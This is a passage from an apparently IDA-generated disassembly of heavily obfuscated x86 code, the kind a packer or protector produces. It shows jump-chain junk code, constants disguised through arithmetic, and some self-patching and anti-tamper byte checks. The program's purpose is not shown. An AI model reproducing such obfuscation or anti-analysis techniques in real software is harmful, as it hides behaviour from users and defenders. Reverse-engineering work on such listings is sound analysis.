		push	edi
		pushf

loc_45A79E:				; CODE XREF: hvvrg7ie:loc_43BB6Ej
		push	674FCE3Ah
		pop	edi
		jmp	loc_45B618
; ---------------------------------------------------------------------------

loc_45A7A9:				; CODE XREF: hvvrg7ie:0043CBFBj
		mov	[ebx], ebp
; START	OF FUNCTION CHUNK FOR sub_43FD2B

loc_45A7AB:				; CODE XREF: sub_43FD2B+16856j
		add	eax, 6C71B8C8h
		add	eax, ebp
		add	eax, 82D95389h
		push	ebp
		jmp	loc_444522
; END OF FUNCTION CHUNK	FOR sub_43FD2B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457F50

loc_45A7BF:				; CODE XREF: sub_457F50-1C358j
		jl	loc_43F107
; END OF FUNCTION CHUNK	FOR sub_457F50
; START	OF FUNCTION CHUNK FOR sub_448100

loc_45A7C5:				; CODE XREF: sub_448100-A918j
		jmp	sub_446A16
; END OF FUNCTION CHUNK	FOR sub_448100
; ---------------------------------------------------------------------------
		or	ecx, eax
		push	0C2DA7C3Eh
		jmp	loc_43F0FD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D4EF

loc_45A7D6:				; CODE XREF: sub_44D4EF:loc_4538A2j
		jz	sub_43FEF7
		jmp	loc_459478
; END OF FUNCTION CHUNK	FOR sub_44D4EF
; ---------------------------------------------------------------------------
		xchg	ebx, [esi]

loc_45A7E3:				; CODE XREF: hvvrg7ie:00442390j
		jmp	sub_44FFD8

; =============== S U B	R O U T	I N E =======================================



sub_45A7E8	proc near		; CODE XREF: hvvrg7ie:00450549j
					; sub_43C290:loc_45ADFAp

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 004394F1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043DA85 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0043F200 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00441820 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00442161 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00445578 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00445624 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00446D1D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044998D SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044A7C4 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044D8CC SIZE 00000002 BYTES
; FUNCTION CHUNK AT 0044DBCC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044EAEB SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044F36F SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00458632 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0045B567 SIZE 0000000B BYTES

		xchg	edi, [esp+0]
		pop	edi
		push	5322FEA4h
		pop	eax
		jmp	loc_458632
sub_45A7E8	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_45A7F7	proc near		; DATA XREF: sub_44048E-4467o

; FUNCTION CHUNK AT 004581A4 SIZE 00000005 BYTES

		cmp	eax, 0FFFFFFFFh
		jz	loc_45A807
		mov	eax, [eax]
		jmp	loc_4581A4
; ---------------------------------------------------------------------------

loc_45A807:				; CODE XREF: hvvrg7ie:loc_43A37Aj
					; sub_43C00F+3j ...
		xor	ebx, ebx

loc_45A809:				; CODE XREF: sub_449D53:loc_44AEB4j
		call	sub_44A0B1

loc_45A80E:				; CODE XREF: sub_44DA1A+DD68j
		jmp	loc_43F091
sub_45A7F7	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458F53

loc_45A813:				; CODE XREF: sub_458F53+21j
		jmp	loc_44F5E9
; END OF FUNCTION CHUNK	FOR sub_458F53
; ---------------------------------------------------------------------------

loc_45A818:				; CODE XREF: hvvrg7ie:0044F46Dj
		jmp	loc_444680
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CEC8

loc_45A81D:				; CODE XREF: sub_44CEC8+58Ej
		jmp	loc_441026
; END OF FUNCTION CHUNK	FOR sub_44CEC8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B048

loc_45A822:				; CODE XREF: sub_45B048-1604Ej
		jmp	loc_44D589
; END OF FUNCTION CHUNK	FOR sub_45B048
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441B2C

loc_45A827:				; CODE XREF: sub_441B2C+5j
		jmp	loc_4433DF
; END OF FUNCTION CHUNK	FOR sub_441B2C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_439E6C

loc_45A82C:				; CODE XREF: sub_439E6C+78C2j
		jmp	sub_4585EE
; END OF FUNCTION CHUNK	FOR sub_439E6C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CCC7

loc_45A831:				; CODE XREF: sub_43CCC7:loc_43ED22j
		push	esi
		push	88E58891h
		pop	esi
		and	esi, 0AC89622Ah
		xor	esi, 0FAD1EFE1h
		or	esi, 2E3C8F26h
		jmp	loc_43DA36
; END OF FUNCTION CHUNK	FOR sub_43CCC7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447E20

loc_45A84F:				; CODE XREF: sub_447E20-B6C1j
		jnz	loc_458950
		jmp	loc_4454AB
; END OF FUNCTION CHUNK	FOR sub_447E20
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450590

loc_45A85A:				; CODE XREF: sub_450590:loc_43EA00j
		pop	esi
		sub	esi, ds:4000F4h
		and	esi, 450E912Dh
		rol	esi, 1Bh
		jmp	loc_455A3F
; END OF FUNCTION CHUNK	FOR sub_450590
; ---------------------------------------------------------------------------

loc_45A86F:				; CODE XREF: hvvrg7ie:00445315j
					; hvvrg7ie:loc_455C77j
		mov	eax, 62h
		call	sub_457C82
		jmp	loc_44BAF2
; ---------------------------------------------------------------------------
		jmp	loc_458EFF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442FD1

loc_45A883:				; CODE XREF: sub_442FD1:loc_43B509j
		push	edi
		jmp	loc_448D6D
; END OF FUNCTION CHUNK	FOR sub_442FD1

; =============== S U B	R O U T	I N E =======================================



sub_45A889	proc near		; CODE XREF: sub_43AC3B:loc_4412C8p
					; hvvrg7ie:0045B3DEj

; FUNCTION CHUNK AT 004423AE SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00447D64 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453D6A SIZE 00000010 BYTES

		xchg	edi, [esp+0]
		pop	edi
		push	49D99FB5h
		pop	ecx
		xor	ecx, 0A6B31774h
		jmp	loc_447D64
sub_45A889	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		dw 8DE0h
dword_45A8A0	dd 77E79F93h		; DATA XREF: sub_44106Cw
					; sub_44107D:loc_44A0BFr ...
; ---------------------------------------------------------------------------

loc_45A8A4:				; CODE XREF: hvvrg7ie:00450CBDj
		jmp	loc_44CF52
; ---------------------------------------------------------------------------
		db 0B3h, 0A7h, 27h
dword_45A8AC	dd 0			; DATA XREF: sub_440C05-5822r
					; sub_4439E7+6r ...
dword_45A8B0	dd 77E805D8h		; DATA XREF: sub_44612F+Ar
					; sub_446581+4r ...
dword_45A8B4	dd 8EFCE362h		; DATA XREF: sub_440643+12275r
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C2EA

loc_45A8B8:				; CODE XREF: sub_44C2EA+BE2Aj
		jmp	nullsub_419
; END OF FUNCTION CHUNK	FOR sub_44C2EA
; ---------------------------------------------------------------------------

loc_45A8BD:				; CODE XREF: hvvrg7ie:00456191j
		jmp	nullsub_21
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445B1F

loc_45A8C2:				; CODE XREF: sub_445B1F+Dj
		jmp	nullsub_382
; END OF FUNCTION CHUNK	FOR sub_445B1F
; ---------------------------------------------------------------------------
		db 0DCh
		dd 8DCCBBF3h
dword_45A8CC	dd 30B4D3BFh		; DATA XREF: hvvrg7ie:0043EE98w
					; sub_456F9F-1432Er ...
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_466. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443452

loc_45A8D1:				; CODE XREF: sub_443452+175E1j
		jmp	loc_4519C1
; END OF FUNCTION CHUNK	FOR sub_443452
; ---------------------------------------------------------------------------

loc_45A8D6:				; CODE XREF: hvvrg7ie:00451D5Bj
		jmp	loc_43BA1D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CB64

loc_45A8DB:				; CODE XREF: sub_44CB64-EF68j
		jmp	nullsub_420
; END OF FUNCTION CHUNK	FOR sub_44CB64
; ---------------------------------------------------------------------------

loc_45A8E0:				; CODE XREF: hvvrg7ie:0043DB95j
		mov	edx, 19CFC62Bh
		call	sub_446A16
		push	eax
		ror	eax, 10h
		jmp	loc_45B390
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443048

loc_45A8F3:				; CODE XREF: sub_443048:loc_45A720j
		lea	eax, sub_443048
		mov	byte ptr [eax],	0C3h
		jmp	loc_4517D8
; END OF FUNCTION CHUNK	FOR sub_443048

; =============== S U B	R O U T	I N E =======================================



sub_45A901	proc near		; CODE XREF: sub_406214+77p
					; sub_4062C4+52p ...
		call	sub_45A91B
		jmp	ds:off_41D154
sub_45A901	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E128

loc_45A90C:				; CODE XREF: sub_43E128+DC56j
		jmp	loc_44890E
; END OF FUNCTION CHUNK	FOR sub_43E128
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458E44

loc_45A911:				; CODE XREF: sub_458E44-10194j
		jmp	sub_458E44
; END OF FUNCTION CHUNK	FOR sub_458E44
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450D8D

loc_45A916:				; CODE XREF: sub_450D8D-171F0j
		jmp	nullsub_544
; END OF FUNCTION CHUNK	FOR sub_450D8D

; =============== S U B	R O U T	I N E =======================================



sub_45A91B	proc near		; CODE XREF: sub_444126+3j
					; sub_456C29+9j ...

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00439158 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441AC9 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00444EFF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447EEE SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0044CB80 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456C37 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004571E6 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045860A SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0045B841 SIZE 00000021 BYTES

		js	loc_456C37
		jmp	loc_44CB80
sub_45A91B	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_45A926:				; CODE XREF: hvvrg7ie:loc_455504j
					; hvvrg7ie:loc_45A9ADj
		jnz	loc_458DF5
		jmp	loc_446022
; ---------------------------------------------------------------------------

loc_45A931:				; CODE XREF: hvvrg7ie:004538B6j
		jnz	loc_441339
		jmp	loc_44C32F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_376. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442334

loc_45A93D:				; CODE XREF: sub_442334+B0CBj
		jmp	loc_43E56F
; END OF FUNCTION CHUNK	FOR sub_442334
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4478FE

loc_45A942:				; CODE XREF: sub_4478FE+Cj
		jmp	loc_448897
; END OF FUNCTION CHUNK	FOR sub_4478FE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D285

loc_45A947:				; CODE XREF: sub_43D285:loc_44A521j
					; sub_43D285+199F3j
		call	sub_439549
		test	al, al
		jz	loc_43BA98
		jmp	loc_44CC8A
; END OF FUNCTION CHUNK	FOR sub_43D285
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4512A0

loc_45A959:				; CODE XREF: sub_4512A0-3D59j
		rol	eax, 11h
		push	eax
		retn
; END OF FUNCTION CHUNK	FOR sub_4512A0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4554E8

loc_45A95E:				; CODE XREF: sub_4554E8-7281j
		jmp	loc_454C63
; END OF FUNCTION CHUNK	FOR sub_4554E8
; ---------------------------------------------------------------------------

loc_45A963:				; CODE XREF: hvvrg7ie:004412B2j
		push	42E6BAE7h
		pop	eax
		rol	eax, 6
		jmp	loc_44DB23
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44107D

loc_45A971:				; CODE XREF: sub_44107D+9049j
		sub	al, 99h
		mov	edx, ds:dword_45A8A0
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jnz	loc_455C9E
		jmp	loc_43AA70
; END OF FUNCTION CHUNK	FOR sub_44107D
; ---------------------------------------------------------------------------
		jmp	loc_455C9E

; =============== S U B	R O U T	I N E =======================================



sub_45A98D	proc near		; CODE XREF: sub_4544DD:loc_444FAFp
					; sub_457740-B81Cj ...
		mov	edx, 1
		jmp	loc_43C979
sub_45A98D	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_371. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_45A998:				; CODE XREF: hvvrg7ie:0044657Cj
		jmp	loc_44F747
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_439529

loc_45A99D:				; CODE XREF: sub_439529+Dj
		jmp	loc_4390B8
; END OF FUNCTION CHUNK	FOR sub_439529
; ---------------------------------------------------------------------------
		call	sub_456CD4
; START	OF FUNCTION CHUNK FOR sub_439873

loc_45A9A7:				; CODE XREF: sub_439873+2B76j
		jmp	nullsub_424
; END OF FUNCTION CHUNK	FOR sub_439873
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_143. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_45A9AD:				; CODE XREF: hvvrg7ie:00445BBFj
		jmp	loc_45A926
; ---------------------------------------------------------------------------

loc_45A9B2:				; CODE XREF: hvvrg7ie:00440816j
		jl	loc_441747
; START	OF FUNCTION CHUNK FOR sub_44E159

loc_45A9B8:				; CODE XREF: sub_44E159+Cj
		jmp	nullsub_425
; END OF FUNCTION CHUNK	FOR sub_44E159
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448BC0

loc_45A9BD:				; CODE XREF: sub_448BC0+4BA7j
		jmp	loc_43B82C
; END OF FUNCTION CHUNK	FOR sub_448BC0
; ---------------------------------------------------------------------------
		sub	edx, 536E71h
		pop	esi
		jmp	loc_441747
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BFF5

loc_45A9CE:				; CODE XREF: sub_445CCD:loc_43A6B3j
					; sub_44C513+1020j ...
		jo	loc_43FA22
		cmp	dword ptr [ebp-4], 0
		jnz	loc_45758E
		jmp	loc_43FC48
; END OF FUNCTION CHUNK	FOR sub_44BFF5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B9BB

loc_45A9E3:				; CODE XREF: sub_45B9BB-3B28j
		and	edx, ebp
		jbe	loc_452A4D
		jmp	loc_454D66
; END OF FUNCTION CHUNK	FOR sub_45B9BB
; ---------------------------------------------------------------------------

loc_45A9F0:				; CODE XREF: hvvrg7ie:loc_45179Ej
		jnz	loc_43F86D
		jmp	loc_45630E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4429CE

loc_45A9FB:				; CODE XREF: sub_4429CE+947Fj
		xor	ecx, ds:4000FBh
		and	ecx, 0FAC2516Bh
		add	ecx, 0DE03D56Dh
		mov	[ecx], eax
		jmp	loc_44322D
; END OF FUNCTION CHUNK	FOR sub_4429CE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450434

loc_45AA14:				; CODE XREF: hvvrg7ie:0044B5C4j
					; sub_450434:loc_45318Bj
		add	esi, 0D13514D2h
		xchg	esi, [esp+0]
		jmp	sub_458706
; END OF FUNCTION CHUNK	FOR sub_450434
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443452

loc_45AA22:				; CODE XREF: sub_443452+43EBj
		jbe	loc_439858

loc_45AA28:				; CODE XREF: sub_443452:loc_445FB8j
		push	909751FDh
		xchg	edi, [esp+8+var_8]
		mov	eax, edi
		pop	edi
		jmp	loc_45A8D1
; END OF FUNCTION CHUNK	FOR sub_443452

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_45AA38	proc near		; DATA XREF: hvvrg7ie:loc_4519E3o

; FUNCTION CHUNK AT 0043A380 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0043EAA9 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00440298 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00444E0B SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044C7AF SIZE 00000005 BYTES

		push	ebp
		mov	ebp, esp
		add	esp, 0FFFFFEF4h
		push	esi
		push	30B6FC87h
		jmp	loc_43EAA9
sub_45AA38	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_45AA4C:				; CODE XREF: hvvrg7ie:004510EFj
		shl	edx, 15h
		sbb	ecx, 0B5A2C0F7h
		adc	edi, 138C75FFh
		push	6E22FDA1h
		jmp	loc_43D412
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451669

loc_45AA65:				; CODE XREF: sub_451669:loc_45773Bj
		pop	ebp
		xor	eax, eax
		mov	[ebp-4], eax
		push	52F1E0EFh
		jmp	loc_44E952
; END OF FUNCTION CHUNK	FOR sub_451669

; =============== S U B	R O U T	I N E =======================================



sub_45AA75	proc near		; DATA XREF: sub_43EEA9+17B42o
		mov	esp, ebp
		call	sub_444219
sub_45AA75	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_44CA9C

loc_45AA7C:				; CODE XREF: sub_44CA9C-2D7j
		jmp	loc_444352
; END OF FUNCTION CHUNK	FOR sub_44CA9C
; ---------------------------------------------------------------------------

loc_45AA81:				; CODE XREF: hvvrg7ie:loc_4597D3j
		rol	ecx, 10h
		and	ecx, 6F670BF9h
		cmp	ecx, 0E33B15B6h
		jmp	loc_442213
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C4D7

loc_45AA95:				; CODE XREF: sub_43C4D7:loc_4423CBj
		pop	ecx
		or	ecx, 10552A34h
		add	ecx, 896DEC0Ah
		popf
		jmp	loc_44FB76
; END OF FUNCTION CHUNK	FOR sub_43C4D7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454789

loc_45AAA8:				; CODE XREF: sub_454789:loc_44E9DDj
		jz	loc_447147
		jmp	loc_457E78
; END OF FUNCTION CHUNK	FOR sub_454789
; ---------------------------------------------------------------------------
		mov	eax, [esp]
		call	sub_43E7F3
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45438B

loc_45AABC:				; CODE XREF: sub_45438B+1Aj
		jmp	loc_44027F
; END OF FUNCTION CHUNK	FOR sub_45438B
; ---------------------------------------------------------------------------
		db 9, 0A1h, 42h
dword_45AAC4	dd 11172E3Dh		; DATA XREF: sub_43C290+6r
					; sub_451E1C-3E9Dw

; =============== S U B	R O U T	I N E =======================================



sub_45AAC8	proc near		; CODE XREF: sub_4054D7+49p
					; sub_405543+49p ...

; FUNCTION CHUNK AT 0043BBB7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043E282 SIZE 00000029 BYTES
; FUNCTION CHUNK AT 0043FFEC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443000 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044322E SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00445989 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00448C54 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00448F3B SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044C74A SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0044DAAE SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044FBFC SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0045643B SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00456E6D SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00457463 SIZE 00000012 BYTES

		jo	loc_448F3B
		mov	eax, ds:dword_43E5D8
		or	eax, eax
		jmp	loc_445989
sub_45AAC8	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_45AADB:				; CODE XREF: hvvrg7ie:00446E03j
		ja	loc_43D95C

; =============== S U B	R O U T	I N E =======================================



sub_45AAE1	proc near		; CODE XREF: sub_447DA3+9p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043C639 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00454530 SIZE 00000017 BYTES

		xchg	eax, [esp+0]
		pop	eax
		xchg	edi, [esp-4+arg_0]
		mov	ecx, edi
		pop	edi
		jmp	loc_454530
sub_45AAE1	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_45AAF0:				; CODE XREF: hvvrg7ie:004596FBj
		jnz	loc_456FC9
		jmp	loc_44645C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E484

loc_45AAFB:				; CODE XREF: sub_43E484+1694j
		or	ebx, ecx

loc_45AAFD:				; CODE XREF: hvvrg7ie:loc_449169j
					; sub_43E484:loc_453A23j
		mov	eax, [ebp-4]
; END OF FUNCTION CHUNK	FOR sub_43E484
; START	OF FUNCTION CHUNK FOR sub_447662

loc_45AB00:				; CODE XREF: sub_447662:loc_43EC34j
		mov	eax, [eax]
		and	eax, 0FFFFFFh
		cmp	eax, 0C3C033h
		jnz	loc_4408EE
		jmp	loc_44CA0B
; END OF FUNCTION CHUNK	FOR sub_447662
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43A839

loc_45AB17:				; CODE XREF: hvvrg7ie:0043E471j
					; sub_43A839:loc_44A822j
		add	eax, 16567F83h
		add	eax, ebp
		add	eax, 0D18F9DF2h
		mov	dword ptr [eax], 594C4C4Fh
		push	0A9B12B1Fh
		xchg	esi, [esp+0]
		mov	eax, esi
		pop	esi
		jmp	loc_451A91
; END OF FUNCTION CHUNK	FOR sub_43A839
; ---------------------------------------------------------------------------
		not	ebp
		jmp	sub_43AFB6

; =============== S U B	R O U T	I N E =======================================



sub_45AB42	proc near		; CODE XREF: sub_419F50+82p
					; hvvrg7ie:0043D1FDj
					; DATA XREF: ...

var_4		= dword	ptr -4

		push	esi
		push	0B7FECDC0h
		pop	esi
		add	esi, 13876ADCh
		and	esi, 48727940h
		add	esi, 0B84199FDh
		xchg	esi, [esp+4+var_4]
		jmp	loc_442792
sub_45AB42	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_475. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4590E0

loc_45AB64:				; CODE XREF: sub_4590E0+8A8j
		jmp	loc_446082
; END OF FUNCTION CHUNK	FOR sub_4590E0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AC6E

loc_45AB69:				; CODE XREF: sub_44AC6E+4EB0j
		jmp	loc_439E05
; END OF FUNCTION CHUNK	FOR sub_44AC6E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4466A4

loc_45AB6E:				; CODE XREF: sub_4466A4+65E0j
		jmp	loc_446D93
; END OF FUNCTION CHUNK	FOR sub_4466A4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441FE4

loc_45AB73:				; CODE XREF: sub_441FE4+166A0j
		jge	sub_458A13

loc_45AB79:				; CODE XREF: sub_441FE4+85EFj
		rol	ecx, 1Eh
		and	ecx, 0C4E91BF1h
		call	sub_441C2A

loc_45AB87:				; CODE XREF: sub_442BE9+18j
		jmp	loc_450E15
; END OF FUNCTION CHUNK	FOR sub_441FE4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4569C6

loc_45AB8C:				; CODE XREF: sub_4569C6:loc_43D928j
		mov	edx, [edx]
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jz	loc_44BB1F
		jmp	loc_44E78C
; END OF FUNCTION CHUNK	FOR sub_4569C6

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_45AB9D	proc near		; CODE XREF: sub_43B7B9+1D30p
					; sub_4465A6:loc_43D90Bj ...

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00445645 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00445C6D SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0044CE02 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D0A6 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044F660 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045138A SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00452B38 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045331E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456DC3 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0045B212 SIZE 00000005 BYTES

		push	ebp
		mov	ebp, esp
		push	ecx
		mov	[ebp+var_4], eax
		push	69C551BBh
		jmp	loc_44F660
sub_45AB9D	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		shr	edi, 0Bh
		jmp	sub_45B9BB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445934

loc_45ABB6:				; CODE XREF: sub_445934+13982j
		jp	loc_456720
		add	eax, esi
		pushf
		sbb	esi, 151A7607h

loc_45ABC5:				; CODE XREF: sub_445934:loc_44FD05j
		call	sub_453E08
; END OF FUNCTION CHUNK	FOR sub_445934
; START	OF FUNCTION CHUNK FOR sub_448100

loc_45ABCA:				; CODE XREF: sub_448100:loc_43BB20j
		mov	edx, 81424EE7h
		call	sub_446A16
		push	esi
		jmp	loc_4436F8
; END OF FUNCTION CHUNK	FOR sub_448100
; ---------------------------------------------------------------------------
		push	237578D5h
		test	edi, ebx
; START	OF FUNCTION CHUNK FOR sub_43B6A5

loc_45ABE1:				; CODE XREF: sub_43B6A5:loc_45ACFCj
		jmp	loc_43EBF5
; END OF FUNCTION CHUNK	FOR sub_43B6A5
; ---------------------------------------------------------------------------
		push	0DF24366Ah
		pop	eax
		and	eax, 77685631h
		xor	eax, 73FE1888h
		push	ecx
		push	6BA0BB03h
		pop	ecx
		rol	ecx, 10h
		jmp	loc_4451D0
; ---------------------------------------------------------------------------
		jmp	ds:dword_41D1B8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43AB99

loc_45AC0D:				; CODE XREF: sub_43AB99+13470j
		jmp	sub_451C5E
; END OF FUNCTION CHUNK	FOR sub_43AB99
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B048

loc_45AC12:				; CODE XREF: sub_45B048-D481j
		jmp	loc_439398
; END OF FUNCTION CHUNK	FOR sub_45B048
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_539. PRESS KEYPAD	"+" TO EXPAND]
		dd 0FFFE46AEh
; ---------------------------------------------------------------------------

loc_45AC1C:				; CODE XREF: hvvrg7ie:0044D4E2j
		jmp	locret_45A168
; ---------------------------------------------------------------------------
		push	edx
		push	0D735FEB3h
		pop	edx
		or	edx, 206AB2DFh
		cmp	edx, 3A9F43C7h
		jmp	loc_452915
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44398A

loc_45AC39:				; CODE XREF: sub_44398A+12B8Fj
		jge	loc_44B831
		rol	ebx, 9

loc_45AC42:				; CODE XREF: sub_44398A:loc_43AAB3j
		mov	eax, [ebp-4]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_441714
		jmp	loc_447EE3
; END OF FUNCTION CHUNK	FOR sub_44398A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451E6D

loc_45AC53:				; CODE XREF: sub_451E6D+56F9j
		pop	eax
		mov	edi, 0C442082Ch
		jmp	loc_445CEC
; END OF FUNCTION CHUNK	FOR sub_451E6D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4500FA

loc_45AC5E:				; CODE XREF: sub_4500FA:loc_44815Fj
					; sub_4500FA+755j
		rol	eax, 0Eh
		xor	eax, 45C6CBA8h
		jnz	loc_4448CE
		not	edi
		mov	edi, 361FF381h
		jmp	loc_4448CE
; END OF FUNCTION CHUNK	FOR sub_4500FA
; ---------------------------------------------------------------------------
		sub	ebp, ebx
		jmp	loc_45567A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D47A

loc_45AC80:				; CODE XREF: sub_44D47A-12DCCj
		jo	loc_44F83E
		add	ebx, 37F41D99h
		pop	ecx
		push	0AA007944h

loc_45AC92:				; CODE XREF: sub_44D47A:loc_43B810j
		mov	eax, [esp-0Ch+arg_8]
		push	ecx
		mov	ecx, eax
		xchg	ecx, [esp-8+arg_4]
		jmp	loc_454D02
; END OF FUNCTION CHUNK	FOR sub_44D47A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45889B

loc_45ACA0:				; CODE XREF: sub_45889B:loc_4433FFj
		push	edi
		push	0CAC4F774h
		pop	edi
